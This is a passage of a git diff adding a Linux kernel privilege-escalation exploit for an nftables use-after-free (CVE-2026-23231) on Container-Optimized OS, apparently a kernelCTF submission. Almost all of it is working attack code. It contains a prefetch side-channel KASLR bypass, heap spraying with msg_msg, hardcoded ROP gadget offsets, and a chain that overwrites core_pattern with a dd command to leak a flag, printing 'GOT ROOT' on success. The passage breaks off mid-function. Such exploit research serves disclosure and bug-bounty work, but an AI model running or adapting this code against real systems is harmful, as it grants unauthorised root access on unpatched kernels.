try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + free_spray(); + /* If userblob mode fails, we can't fallback to physmap */ + if (use_userblob) { + printf("[-] userblob race did not win\n"); + return 1; + } + printf("[-] exact KVA race did not win\n"); + return 1; + } + + /* + * KVA offset strategy: pagemap is unavailable in the runner. First try + * kbase-relative __init aliases as in the 521.98 exploit, then fall + * back to direct-map guesses. Each guessed KVA gets a fresh child so + * namespace and nft state do not accumulate across candidates. + */ + if (try_init_alias_candidates()) + return 0; + + uint64_t primary_offsets[] = { + 0x50000000ULL, /* 1.25 GB */ + 0x30000000ULL, /* 0.75 GB */ + 0x60000000ULL, /* 1.5 GB */ + 0x40000000ULL, /* 1.0 GB */ + 0x80000000ULL, /* 2.0 GB */ + 0x20000000ULL, /* 0.5 GB */ + 0x78000000ULL, /* 1.875 GB */ + 0x90000000ULL, /* 2.25 GB */ + 0xa0000000ULL, /* 2.5 GB */ + 0x70000000ULL, /* 1.75 GB */ + }; + + printf("[*] phase1: primary phbase=%#lx, %zu KVAs [0.5-2.5GB]\n", + (unsigned long)phbase, + sizeof(primary_offsets) / sizeof(primary_offsets[0])); + + for (size_t i = 0; i < sizeof(primary_offsets) / sizeof(primary_offsets[0]); i++) { + if (run_fresh_candidate(phbase + primary_offsets[i], + RACE_DURATION_SEC)) + return 0; + } + + size_t max_alt = n_phbase_cands < 5 ? n_phbase_cands : 5; + for (size_t i = 1; i < max_alt; i++) { + uint64_t pb = phbase_cands[i]; + long delta_mb = (long)((int64_t)(pb - phbase) >> 20); + printf("[*] phase2: alt phbase=%#lx (%+ldMB)\n", + (unsigned long)pb, delta_mb); + if (run_fresh_candidate(pb + 0x60000000ULL, + RACE_DURATION_SEC)) + return 0; + } + + printf("[-] exploit failed\n"); + return 1; +} + +/* ================================================================ + * TEST_ROP mode -- verify ROP blob and spray layout offline + * ================================================================ */ +static void test_rop_mode(void) { + printf("[*] TEST_ROP mode: verifying blob and spray layout\n"); + + /* Use dummy addresses if not provided */ + if (!kbase) kbase = 0xffffffff81000000ULL; + if (!phbase) phbase = 0xffff888000000000ULL; + g_page_kva = phbase + 0x10000000ULL; /* arbitrary */ + + printf("[*] kbase = %#lx\n", (unsigned long)kbase); + printf("[*] phbase = %#lx\n", (unsigned long)phbase); + printf("[*] page_kva = %#lx\n", (unsigned long)g_page_kva); + + /* Build and dump ROP blob */ + uint8_t blob[256]; + memset(blob, 0, sizeof(blob)); + build_blob(blob, g_page_kva); + + printf("\n[*] ROP blob layout (0x98 bytes):\n"); + printf(" +0x000 blob_size = %#lx\n", + *(uint64_t*)(blob + 0x000)); + printf(" +0x008 rdp0 = %#lx (dlen=%lu)\n", + *(uint64_t*)(blob + 0x008), + *(uint64_t*)(blob + 0x008) >> 1); + printf(" +0x010 expr0.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x010)); + printf(" +0x018 expr0.d[0] = %#lx (pop_rsi_rdi)\n", + *(uint64_t*)(blob + 0x018)); + printf(" +0x020 expr0.d[1] = %#lx (src_va = page_kva+0x%x)\n", + *(uint64_t*)(blob + 0x020), PATH_OFFSET); + printf(" +0x028 dreg=%-3u len=%u\n", blob[0x028], blob[0x029]); + printf(" +0x030 expr1.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x030)); + printf(" +0x038 expr1.d[0] = %#lx (%s)\n", + *(uint64_t*)(blob + 0x038), + use_core_pattern ? "core_pattern" : "modprobe_path"); + printf(" +0x040 expr1.d[1] = %#lx (strcpy)\n", + *(uint64_t*)(blob + 0x040)); + printf(" +0x048 dreg=%-3u len=%u\n", blob[0x048], blob[0x049]); + printf(" +0x050 expr2.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x050)); + printf(" +0x058 expr2.d[0] = %#lx (pop_rdi)\n", + *(uint64_t*)(blob + 0x058)); + printf(" +0x060 expr2.d[1] = %#lx (100000)\n", + *(uint64_t*)(blob + 0x060)); + printf(" +0x068 dreg=%-3u len=%u\n", blob[0x068], blob[0x069]); + printf(" +0x070 expr3.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x070)); + printf(" +0x078 expr3.d[0] = %#lx (msleep)\n", + *(uint64_t*)(blob + 0x078)); + printf(" +0x080 expr3.d[1] = %#lx (return_thunk)\n", + *(uint64_t*)(blob + 0x080)); + printf(" +0x088 dreg=%-3u len=%u\n", blob[0x088], blob[0x089]); + printf(" +0x090 rdp1 = %#lx (end marker)\n", + *(uint64_t*)(blob + 0x090)); + + /* Build and dump msg_msg spray */ + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *msgbuf = calloc(1, bufsz); + build_spray_msg(msgbuf, g_page_kva); + char *mtext = msgbuf + sizeof(long); + + printf("\n[*] msg_msg spray layout (mtext offsets):\n"); + uint64_t bg0, bg1; + memcpy(&bg0, mtext + (ALLOC_BLOB_GEN0 - MSG_HDR_SZ), 8); + memcpy(&bg1, mtext + (ALLOC_BLOB_GEN1 - MSG_HDR_SZ), 8); + printf(" mtext[%d] (alloc+%d) policy = %u (expect 1=NF_ACCEPT)\n", + ALLOC_POLICY - MSG_HDR_SZ, ALLOC_POLICY, + (unsigned)mtext[ALLOC_POLICY - MSG_HDR_SZ]); + printf(" mtext[%d] (alloc+%d) blob_gen_0 = %#lx\n", + ALLOC_BLOB_GEN0 - MSG_HDR_SZ, ALLOC_BLOB_GEN0, + (unsigned long)bg0); + printf(" mtext[%d] (alloc+%d) blob_gen_1 = %#lx\n", + ALLOC_BLOB_GEN1 - MSG_HDR_SZ, ALLOC_BLOB_GEN1, + (unsigned long)bg1); + printf(" mtext[%d] (alloc+%d) flags = 0x%02x (expect 0x01=NFT_CHAIN_BASE)\n", + ALLOC_FLAGS - MSG_HDR_SZ, ALLOC_FLAGS, + (unsigned)mtext[ALLOC_FLAGS - MSG_HDR_SZ]); + + /* Verify consistency */ + int ok = 1; + if (bg0 != g_page_kva) { + printf("[-] MISMATCH: blob_gen_0 != page_kva\n"); ok = 0; + } + if (bg1 != g_page_kva) { + printf("[-] MISMATCH: blob_gen_1 != page_kva\n"); ok = 0; + } + if (mtext[ALLOC_POLICY - MSG_HDR_SZ] != 1) { + printf("[-] MISMATCH: policy != 1\n"); ok = 0; + } + if (mtext[ALLOC_FLAGS - MSG_HDR_SZ] != 0x01) { + printf("[-] MISMATCH: flags != 0x01\n"); ok = 0; + } + + /* Verify expected addresses */ + printf("\n[*] Computed addresses:\n"); + printf(" target (%s) = %#lx\n", + use_core_pattern ? "core_pattern" : "modprobe_path", + (unsigned long)(kbase + (use_core_pattern ? OFF_CORE_PATTERN : OFF_MODPROBE))); + printf(" nft_imm_ops = %#lx\n", + (unsigned long)(kbase + OFF_NFT_IMM_OPS)); + printf(" pop_rsi_rdi = %#lx\n", + (unsigned long)(kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK)); + printf(" strcpy = %#lx\n", + (unsigned long)(kbase + OFF_STRCPY)); + printf(" msleep = %#lx\n", + (unsigned long)(kbase + OFF_MSLEEP)); + printf(" pop_rdi = %#lx\n", + (unsigned long)(kbase + OFF_POP_RDI_JMP_RETURN_THUNK)); + printf(" return_thunk = %#lx\n", + (unsigned long)(kbase + OFF_RETURN_THUNK)); + printf(" src_va (path) = %#lx\n", + (unsigned long)(g_page_kva + PATH_OFFSET)); + + printf("\n[%c] TEST_ROP %s\n", ok ? '+' : '-', + ok ? "PASSED" : "FAILED"); + + free(msgbuf); +} + +/* ================================================================ + * Entry point + * ================================================================ */ +int main(int argc, char **argv) { + /* TEST_ROP mode: verify blob/spray layout without running race */ + if (getenv("TEST_ROP")) { + kbase = env_u64("KBASE"); + phbase = env_u64("PHYSBASE"); + test_rop_mode(); + return 0; + } + + auto_physmap_size(); + + /* Detect SMAP: if off, we can use a userspace blob and skip + * the entire physmap spray + phbase Entrybleed scan. */ + int smap_present = check_smap(); + if (!smap_present) { + printf("[+] SMAP not detected -- using userspace blob\n"); + use_userblob = 1; + } else { + printf("[*] SMAP detected -- using physmap approach\n"); + } + + kbase = env_u64("KBASE"); + phbase = env_u64("PHYSBASE"); + + /* kernelCTF repro with requires_separate_kaslr_leak=true appends + * "nokaslr -- kaslr_leak=1"; init.sh passes the kallsyms text base + * as argv. It does not pass a direct-map base, so derive that from + * nokaslr below. */ + int verifier_trigger_arg = 0; + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) { + verifier_trigger_arg = 1; + continue; + } + if (kbase) + continue; + uint64_t cli_kbase = 0; + if (parse_u64_arg(argv[i], &cli_kbase)) { + if (cli_kbase == 0 && kernel_cmdline_has_token("nokaslr")) { + cli_kbase = KTEXT_SCAN_START; + printf("[*] argv kbase was 0; using nokaslr fallback %#lx\n", + (unsigned long)cli_kbase); + } + kbase = cli_kbase; + printf("[+] argv kbase=%#lx\n", (unsigned long)kbase); + } else { + printf("[!] ignoring unparsable argv kbase: %s\n", argv[i]); + } + } + + if (kernel_cmdline_has_token("nokaslr")) { + if (!kbase) { + kbase = KTEXT_SCAN_START; + printf("[*] nokaslr detected; using fixed kbase=%#lx\n", + (unsigned long)kbase); + } + if (!phbase) { + phbase = DIRECT_MAP_START; + printf("[*] nokaslr detected; using fixed phbase=%#lx\n", + (unsigned long)phbase); + } + } + if (verifier_trigger_arg) { + printf("[*] verifier --vuln-trigger mode enabled\n"); + return vuln_trigger_main(); + } + + if (kbase && phbase) { + n_kbase_cands = 1; + kbase_cands[0] = kbase; + n_phbase_cands = 1; + phbase_cands[0] = phbase; + } + if (use_userblob) { + /* Only need kbase for ROP gadgets, phbase is irrelevant */ + if (!kbase && !do_entrybleed()) + return 1; + if (!kbase) { + printf("[-] Entrybleed failed for kbase\n"); + return 1; + } + phbase = 0xffff888000000000ULL; /* unused but set for safety */ + } else { + if ((!kbase || !phbase) && !do_entrybleed()) + return 1; + if (!kbase || !phbase) { + fprintf(stderr, "[-] need KBASE and PHYSBASE\n"); + return 1; + } + } + printf("[+] kbase = %#lx\n", (unsigned long)kbase); + printf("[+] phbase = %#lx\n", (unsigned long)phbase); + if (use_userblob) + printf("[+] blob = userspace @ %#lx\n", + (unsigned long)USERBLOB_ADDR); + + /* Create payload files BEFORE forking so parent can trigger + * modprobe after the ROP overwrites modprobe_path. The ROP + * chain calls msleep(100s) which BUGs "scheduling while atomic" + * but keeps the process alive (unlike do_exit which killed it + * and closed the memfd FDs). */ + setup_payload(); + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) + _exit(exploit_main()); + + for (int t = 0; t < 300; t++) { + sleep_ms(2000); + + if (try_trigger()) { + printf("\n[+] ===== GOT ROOT =====\n"); + kill(child, SIGKILL); + waitpid(child, NULL, WNOHANG); + return 0; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + printf("[*] child exited (status=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1); + for (int i = 0; i < 30; i++) { + if (try_trigger()) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + sleep_ms(500); + } + break; + } + } + + kill(child, SIGKILL); + waitpid(child, NULL, 0); + + printf("[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit_xdk.cpp b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit_xdk.cpp new file mode 100644 index 000000000..65eaaeb3c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit_xdk.cpp @@ -0,0 +1,2497 @@ +/* + * LPE exploit for cos-113-18244.521.88 (Linux 6.1.155) + * kernelXDK-ported version + * + * Vulnerability: packet-path UAF in nftables via NFPROTO_INET partial hook + * install. IPv4 hook registration succeeds, IPv6 fails with + * -E2BIG -> rollback frees chain/blob immediately while a + * racing packet still dereferences priv->chain in + * nft_do_chain(). + * + * Exploitation: + * 1. Prefetch side-channel KASLR bypass. + * 2. Physmap spray with fake rule blob (ROP via nft_immediate_eval). + * 3. Saturate IPv6 LOCAL_OUT hooks to MAX_HOOK_COUNT (1024). + * 4. Race: UDP flood + INET basechain create/destroy loop + msg_msg spray + * to reclaim freed nft_base_chain (kmalloc-256) with blob_gen_X -> + * physmap page. + * 5. ROP: strcpy(core_pattern, "|/bin/dd ...") -> msleep(~forever). + * 6. Trigger core dump -> flag on serial console. + */ +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* kernelXDK headers */ +#include +#include + +/* Embed the KXDB target database into the binary */ +INCBIN(target_db, "target_db.kxdb"); +/* xdk INCBIN macro leaves the assembler section in .bss; restore .text. */ +__asm__(".text\n"); + +/* ================================================================ + * Protocol constants + * ================================================================ */ +#ifndef NFPROTO_UNSPEC +#define NFPROTO_UNSPEC 0 +#endif +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFPROTO_IPV6 +#define NFPROTO_IPV6 10 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif + +/* ================================================================ + * Magic-number constants + * ================================================================ */ +#define RACE_CPU 0 +#define FLOOD_CPU 1 +#define DROP_UID 1000 +#define DROP_GID 1000 +#define NL_BUFSZ (1 << 20) /* 1MB netlink socket buffer */ +#define RACE_NL_BUFSZ (1 << 21) /* 2MB race netlink buffer */ +#define RECV_TIMEOUT_SEC 5 +#define PROGRESS_INTERVAL 128 +#define RACE_PROGRESS_INTERVAL 2000 +#define CHAIN_NAME_MOD 10000 +#define PARENT_POLL_ITERATIONS 300 +#define PARENT_POLL_MS 2000 +#define POST_EXIT_POLLS 30 +#define POST_EXIT_POLL_MS 500 +#define CORE_DUMP_WAIT_MS 2000 +#define MODPROBE_WAIT_MS 500 +#define MSLEEP_FOREVER 0x7FFFFFFFULL +#define UDP_PORT 12345 +#define VULN_TRIGGER_SECONDS 170 +#define VULN_TRIGGER_LOG_EVERY 10 +#define VULN_TRIGGER_FLOODS 4 +#define BLOB_TOTAL_SIZE 0x98 +#define ENTRYBLEED_SCAN_ROUNDS 256 +#define ENTRYBLEED_REFINE_ROUNDS 384 +#define ENTRYBLEED_DUMMY_ITERS 3 +#define THRESHOLD_HIGH 1.1 +#define THRESHOLD_LOW 0.9 +#define EB_COARSE_RANGE 0x40000000ULL +#define EB_COARSE_STEP 0x200000ULL +#define EB_REFINE_RANGE 0x2000000ULL +#define PH_COARSE_RANGE 0x400000000000ULL +#define PH_COARSE_STEP 0x40000000ULL +#define PH_COARSE_ITERS 50 +#define PH_REFINE_ITERS 100 +#define FLOOD_YIELD_INTERVAL 8 + +/* ================================================================ + * Kernel symbol offsets -- resolved at runtime from kernelXDK + * + * Fallback values are for cos-113-18244.521.88 vmlinux if the + * KXDB database does not contain the target or symbol. + * ================================================================ */ +static uint64_t off_modprobe = 0x2a76a20; +static uint64_t off_core_pattern = 0x2bb9ec0; +static uint64_t off_page_offset = 0x21ac9a0; +static uint64_t off_nft_imm_ops = 0x1d433e0; +static uint64_t off_entry_syscall = 0x1400080; +static uint64_t off_init_begin = 0x345c000; +static uint64_t off_init_end = 0x36de000; + +/* + * cos-113-18244.521.88 vmlinux ROP gadgets. + * These are not kernel symbols, so they are intentionally not registered in + * the XDK TargetDb. Keep them as documented target-specific gadget offsets. + */ +/* 0xffffffff81afc2d1: pop rsi ; pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK 0xafc2d1ULL +/* 0xffffffff81195d8c: pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RDI_JMP_RETURN_THUNK 0x195d8cULL +/* cos-113-18244.521.88 vmlinux symbols */ +/* strcpy (kernel internal) */ +static uint64_t off_strcpy = 0x12b59f0; +/* msleep - schedule timeout */ +static uint64_t off_msleep = 0x243850; +/* __x86_return_thunk - retpoline return */ +static uint64_t off_return_thunk = 0x16054b0; + +/* ================================================================ + * nft_base_chain layout -- resolved from kernelXDK struct info + * or hardcoded fallback for cos-113 + * + * nft_base_chain is ~216 bytes -> kmalloc-256 + * +64: basechain.policy (u8, need NF_ACCEPT = 1) + * +80: chain.blob_gen_0 (ptr) + * +88: chain.blob_gen_1 (ptr) + * +164: chain.flags byte (need bit 0 set = NFT_CHAIN_BASE) + * ================================================================ */ +static uint64_t NFT_BASE_CHAIN_OFFS_BLOB_GEN0 = 80; +static uint64_t NFT_BASE_CHAIN_OFFS_BLOB_GEN1 = 88; +static uint64_t NFT_BASE_CHAIN_OFFS_POLICY = 64; +static uint64_t NFT_BASE_CHAIN_OFFS_FLAGS = 164; +static uint64_t MSG_MSG_SIZE = 48; /* sizeof(struct msg_msg) */ + +/* ================================================================ + * Register custom target data for symbols/structs not in the + * standard KXDB database + * ================================================================ */ +static void register_custom_targets(TargetDb &kxdb) { + Target ct("kernelctf", "cos-113-18244.521.88"); + + /* Symbols specific to cos-113-18244.521.88 vmlinux */ + ct.AddSymbol("core_pattern", 0x2bb9ec0); + ct.AddSymbol("modprobe_path", 0x2a76a20); + ct.AddSymbol("page_offset_base", 0x21ac9a0); + ct.AddSymbol("nft_immediate_ops", 0x1d433e0); + ct.AddSymbol("entry_SYSCALL_64", 0x1400080); + ct.AddSymbol("__init_begin", 0x345c000); + ct.AddSymbol("__init_end", 0x36de000); + ct.AddSymbol("strcpy", 0x12b59f0); + ct.AddSymbol("__x86_return_thunk", 0x16054b0); + + /* nft_base_chain layout (kmalloc-256) */ + ct.AddStruct("nft_base_chain", 256, { + {"policy", 64, 1}, + {"chain.blob_gen_0", 80, 8}, + {"chain.blob_gen_1", 88, 8}, + {"chain.flags", 164, 1}, + }); + + kxdb.AddTarget(ct); +} + +/* + * Resolve all offsets from the kernelXDK target database. + * Falls back to hardcoded cos-113 values if a symbol is missing. + */ + +static uint64_t try_get_symbol(Target &target, const char *name, + uint64_t fallback) { + try { + uint64_t off = target.GetSymbolOffset(name); + if (off != 0) return off; + } catch (...) {} + printf("[*] xdk: symbol '%s' not in KXDB, using fallback %#lx\n", + name, (unsigned long)fallback); + return fallback; +} + +static uint64_t try_get_field(Target &target, const char *sname, + const char *fname, uint64_t fallback) { + try { + return target.GetFieldOffset(sname, fname); + } catch (...) {} + return fallback; +} + +static uint64_t try_get_struct_size(Target &target, const char *sname, + uint64_t fallback) { + try { + return target.GetStructSize(sname); + } catch (...) {} + return fallback; +} + +static void xdk_init_offsets(void) { + try { + TargetDb kxdb("target_db.kxdb", target_db); + register_custom_targets(kxdb); + + auto target = kxdb.AutoDetectTarget(); + printf("[+] xdk: detected target: %s %s\n", + target.GetDistro().c_str(), + target.GetReleaseName().c_str()); + + /* Resolve symbol offsets */ + off_core_pattern = try_get_symbol(target, "core_pattern", off_core_pattern); + off_modprobe = try_get_symbol(target, "modprobe_path", off_modprobe); + off_page_offset = try_get_symbol(target, "page_offset_base", off_page_offset); + off_nft_imm_ops = try_get_symbol(target, "nft_immediate_ops", off_nft_imm_ops); + off_entry_syscall = try_get_symbol(target, "entry_SYSCALL_64", off_entry_syscall); + off_init_begin = try_get_symbol(target, "__init_begin", off_init_begin); + off_init_end = try_get_symbol(target, "__init_end", off_init_end); + off_strcpy = try_get_symbol(target, "strcpy", off_strcpy); + off_msleep = try_get_symbol(target, "msleep", off_msleep); + off_return_thunk = try_get_symbol(target, "__x86_return_thunk", off_return_thunk); + + /* Resolve struct offsets */ + MSG_MSG_SIZE = try_get_struct_size(target, "msg_msg", MSG_MSG_SIZE); + NFT_BASE_CHAIN_OFFS_BLOB_GEN0 = try_get_field(target, "nft_base_chain", + "chain.blob_gen_0", NFT_BASE_CHAIN_OFFS_BLOB_GEN0); + NFT_BASE_CHAIN_OFFS_BLOB_GEN1 = try_get_field(target, "nft_base_chain", + "chain.blob_gen_1", NFT_BASE_CHAIN_OFFS_BLOB_GEN1); + NFT_BASE_CHAIN_OFFS_POLICY = try_get_field(target, "nft_base_chain", + "policy", NFT_BASE_CHAIN_OFFS_POLICY); + NFT_BASE_CHAIN_OFFS_FLAGS = try_get_field(target, "nft_base_chain", + "chain.flags", NFT_BASE_CHAIN_OFFS_FLAGS); + + printf("[+] xdk: all offsets resolved\n"); + } catch (std::exception &e) { + printf("[!] xdk init failed: %s -- using hardcoded cos-113 offsets\n", + e.what()); + } +} + +/* MFD_EXEC was added in kernel 6.3 */ +#ifndef MFD_EXEC +#define MFD_EXEC 0x0010U +#endif + +/* + * nft_do_chain stack frame (6.1.155): + * sub $0x220, %rsp; 6 pushes = 48 bytes + * regs at rsp+0x48 + * return address at rsp+0x250 + * dreg for ret addr = (0x250 - 0x48) / 4 = 130 + */ +#define DREG_RET 130 +#define DREG_RET4 134 +#define DREG_RET8 138 +#define DREG_RET12 142 + +/* ---------- tuning ---------- */ +#define IPV6_SATURATE_MAX 1100 +#define NUM_SPRAY_QS 256 +#define MSGS_PER_Q 4 +#define RACE_DURATION_SEC 30 +#define PHYSMAP_MB 2560 +#define INIT_ALIAS_CANDS 26 +#define INIT_ALIAS_SEC 20 +#define INIT_TIMING_PROBES 8 +#define WORKER_GRACE_SEC 6 +#define PATH_OFFSET 0x100 +#define MAX_KBASE_CANDS 40 +#define MAX_PHBASE_CANDS 20 +#define KVA_CYCLE_ROUNDS 20 +#define USERBLOB_ADDR 0x13370000ULL + +/* ---------- globals ---------- */ +static uint64_t kbase = 0; +static uint64_t phbase = 0; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva = 0; +static void *phys_region = nullptr; +static volatile int race_running = 0; +static volatile int race_won = 0; +static int use_userblob = 0; + +/* namespace-safe payload delivery via memfd */ +static char g_modprobe_path[64] = "/tmp/pw"; +static int g_pw_fd = -1; +static int g_result_fd = -1; + +/* core_pattern approach */ +static const char g_core_cmd[] = "|/bin/dd if=/dev/vdb of=/dev/ttyS0"; +static int use_core_pattern = 1; + +#ifndef SYS_memfd_create +#define SYS_memfd_create 319 +#endif + +/* ---------- helpers ---------- */ +static void die(const char *msg) { + perror(msg); + _exit(1); +} +static void sleep_ms(int ms) { + struct timespec ts = { ms / 1000, (ms % 1000) * 1000000L }; + nanosleep(&ts, nullptr); +} +static uint64_t env_u64(const char *name) { + const char *val = getenv(name); + return val ? strtoull(val, nullptr, 0) : 0; +} + +static bool parse_u64_arg(const char *s, uint64_t *out) { + if (!s || !*s || !out) return false; + + errno = 0; + char *end = nullptr; + unsigned long long v = strtoull(s, &end, 0); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast(v); + return true; + } + + errno = 0; + end = nullptr; + v = strtoull(s, &end, 16); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast(v); + return true; + } + return false; +} + +static bool kernel_cmdline_has_token(const char *token) { + if (!token || !*token) return false; + + char buf[4096] = {}; + int cmdline_fd = open("/proc/cmdline", O_RDONLY | O_CLOEXEC); + if (cmdline_fd < 0) return false; + ssize_t n = read(cmdline_fd, buf, sizeof(buf) - 1); + close(cmdline_fd); + if (n <= 0) return false; + buf[n] = '\0'; + + size_t token_len = strlen(token); + for (char *p = buf; *p;) { + while (*p == ' ' || *p == '\n' || *p == '\t') p++; + if (!*p) break; + char *q = p; + while (*q && *q != ' ' && *q != '\n' && *q != '\t') q++; + if (static_cast(q - p) == token_len && memcmp(p, token, token_len) == 0) + return true; + p = q; + } + return false; +} +static void cpu_pin(int cpu) { + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(cpu, &cpuset); + sched_setaffinity(0, sizeof(cpuset), &cpuset); +} + +static int setup_check_smap(void) { + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) return 1; + char line[4096]; + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "flags", 5) == 0) { + fclose(f); + if (strstr(line, " smap")) + return 1; + return 0; + } + } + fclose(f); + return 1; +} + +/* ================================================================ + * KASLR bypass: prefetch side channel + * ================================================================ */ +// @step(name="KASLR Bypass via Prefetch Side Channel") +#define PREFETCH_SCAN_TRIES (64 * 1024) +#define PREFETCH_CONFIRM_TRIES (128 * 1024) +#define PREFETCH_HIST_SIZE 4000 +#define PREFETCH_THRESHOLD_DEFAULT 190 +#define PREFETCH_THRESHOLD_XEON 130 +#define PREFETCH_THRESHOLD_MARGIN 24 +#define KTEXT_SCAN_START 0xffffffff81000000ULL +#define KTEXT_SCAN_END 0xffffffffc1000000ULL +#define KTEXT_SCAN_STEP 0x200000ULL +#define KTEXT_INTEL_STEP 0x1000000ULL +#define DIRECT_MAP_START 0xffff888000000000ULL +#define DIRECT_MAP_END 0xffffc88000000000ULL +#define DIRECT_MAP_COARSE_STEP 0x80000000ULL +#define DIRECT_MAP_CAND_STEP 0x10000000ULL +#define DIRECT_MAP_REFINE_STEP 0x10000000ULL +#define INTEL_PREFETCH_SAMPLES 16 +#define INTEL_PREFETCH_VOTES 7 +#define INTEL_DIRECT_COARSE_STEP 0x40000000ULL +#define INTEL_DIRECT_REFINE_STEP 0x4000000ULL + +static size_t prefetch_hist[PREFETCH_HIST_SIZE]; +static int prefetch_threshold; +static int prefetch_cpu_vendor = -1; + +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) +{ + uint64_t a, d; + asm volatile("mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) +{ + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline void prefetch_probe(const void *p) +{ + asm volatile("prefetchnta (%0)" : : "r"(p)); + asm volatile("prefetcht2 (%0)" : : "r"(p)); +} + +static size_t prefetch_once(uint64_t addr) +{ + size_t t = rdtsc_begin(); + prefetch_probe((const void *)addr); + return rdtsc_end() - t; +} + +static size_t prefetch_measure_tries(uint64_t addr, int tries) +{ + memset(prefetch_hist, 0, sizeof(prefetch_hist)); + for (int i = 0; i < tries; i++) { + size_t d = prefetch_once(addr); + if (d >= PREFETCH_HIST_SIZE) + d = PREFETCH_HIST_SIZE - 1; + prefetch_hist[d]++; + } + + size_t sum = 0; + for (int i = 0; i < PREFETCH_HIST_SIZE; i++) + sum += prefetch_hist[i] * i; + return sum / tries; +} + +static size_t prefetch_measure(uint64_t addr) +{ + return prefetch_measure_tries(addr, PREFETCH_CONFIRM_TRIES); +} + +static int prefetch_cpu_is_intel(void) +{ + if (prefetch_cpu_vendor >= 0) + return prefetch_cpu_vendor == 1; + + prefetch_cpu_vendor = 0; + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) + return 0; + + char line[512]; + while (fgets(line, sizeof(line), f)) { + if (strstr(line, "GenuineIntel") || strstr(line, "Intel(R)")) { + prefetch_cpu_vendor = 1; + break; + } + } + fclose(f); + return prefetch_cpu_vendor == 1; +} + +static void detect_prefetch_threshold(void) +{ + char buf[512] = {0}; + int cpuinfo_fd = open("/proc/cpuinfo", O_RDONLY | O_CLOEXEC); + + prefetch_threshold = PREFETCH_THRESHOLD_DEFAULT; + if (cpuinfo_fd >= 0) { + ssize_t n = read(cpuinfo_fd, buf, sizeof(buf) - 1); + close(cpuinfo_fd); + if (n > 0 && strstr(buf, "Xeon")) + prefetch_threshold = PREFETCH_THRESHOLD_XEON; + } +} + +static void pin_prefetch_cpu(cpu_set_t *oldset, int *have_old) +{ + cpu_set_t set; + + *have_old = sched_getaffinity(0, sizeof(*oldset), oldset) == 0; + CPU_ZERO(&set); + CPU_SET(0, &set); + if (sched_setaffinity(0, sizeof(set), &set) < 0) + perror("sched_setaffinity(prefetch)"); +} + +static void restore_prefetch_cpu(cpu_set_t *oldset, int have_old) +{ + if (have_old && sched_setaffinity(0, sizeof(*oldset), oldset) < 0) + perror("sched_setaffinity(restore)"); +} + +static size_t prefetch_measure_min(uint64_t addr, int samples, + int prime_syscall) +{ + size_t best = (size_t)-1; + + for (int i = 0; i < samples; i++) { + if (prime_syscall) + (void)syscall(SYS_getuid); + size_t t = prefetch_once(addr); + if (t < best) + best = t; + } + return best; +} + +static uint64_t prefetch_scan_lowest_vote(const char *name, uint64_t start, + uint64_t end, uint64_t step, + uint64_t probe_add, + int prime_syscall) +{ + cpu_set_t oldset; + int have_old = 0; + uint64_t votes[INTEL_PREFETCH_VOTES] = {}; + + pin_prefetch_cpu(&oldset, &have_old); + printf("[*] prefetch %s: intel-min step=%#lx probe_add=%#lx\n", + name, (unsigned long)step, (unsigned long)probe_add); + + for (int vote = 0; vote < INTEL_PREFETCH_VOTES; vote++) { + uint64_t best_addr = 0; + size_t best = (size_t)-1; + size_t second = (size_t)-1; + unsigned long best_idx = 0; + unsigned long idx = 0; + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_min(addr + probe_add, + INTEL_PREFETCH_SAMPLES, + prime_syscall); + if (t < best) { + second = best; + best = t; + best_addr = addr; + best_idx = idx; + } else if (t < second) { + second = t; + } + } + + if (second != (size_t)-1 && best == second) { + printf("[*] prefetch %s: intel vote %d flat best=%#lx t=%zu\n", + name, vote, (unsigned long)best_addr, best); + votes[vote] = 0; + continue; + 